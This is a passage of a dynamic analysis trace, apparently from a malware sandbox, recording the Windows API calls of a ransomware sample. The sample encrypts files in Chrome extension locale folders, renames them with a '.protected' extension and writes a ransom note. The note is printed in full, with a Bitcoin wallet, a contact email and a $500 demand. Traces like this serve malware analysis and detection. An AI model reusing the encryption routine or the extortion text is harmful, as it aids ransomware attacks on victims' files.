hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.419] CloseHandle (hObject=0x164) returned 1 [0083.420] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.420] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0083.420] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0083.420] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0083.420] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0083.420] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0083.420] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de") returned 150 [0083.420] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0083.420] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0083.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*") returned 152 [0083.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\.") returned 152 [0083.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.420] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.421] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.421] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.421] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.421] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\..") returned 153 [0083.421] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.421] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.421] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0083.421] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.421] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.421] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.421] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0083.422] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0083.422] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0083.422] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.422] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.437] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.438] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.438] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.438] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.438] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.438] CloseHandle (hObject=0x168) returned 1 [0083.438] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.protected") returned 174 [0083.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.protected")) returned 1 [0083.439] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.440] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.440] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\RESTORE_FILES.txt") returned 168 [0083.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.440] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.440] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.441] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.441] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.441] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.441] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.442] CloseHandle (hObject=0x164) returned 1 [0083.442] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.442] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0083.442] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0083.442] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0083.442] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0083.442] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0083.442] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el") returned 150 [0083.442] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0083.442] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0083.442] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*") returned 152 [0083.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.442] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.442] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.442] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.442] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.442] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.442] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\.") returned 152 [0083.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.442] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.442] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.442] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.442] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.443] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.443] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\..") returned 153 [0083.443] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.443] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.443] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0083.443] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.443] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.443] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.443] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0083.444] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0083.444] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0083.444] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.444] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.453] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.453] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.454] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.454] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.454] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.454] CloseHandle (hObject=0x168) returned 1 [0083.454] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.protected") returned 174 [0083.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.protected")) returned 1 [0083.455] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.455] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.455] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\RESTORE_FILES.txt") returned 168 [0083.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.456] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.456] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.457] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.457] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.457] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.457] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, 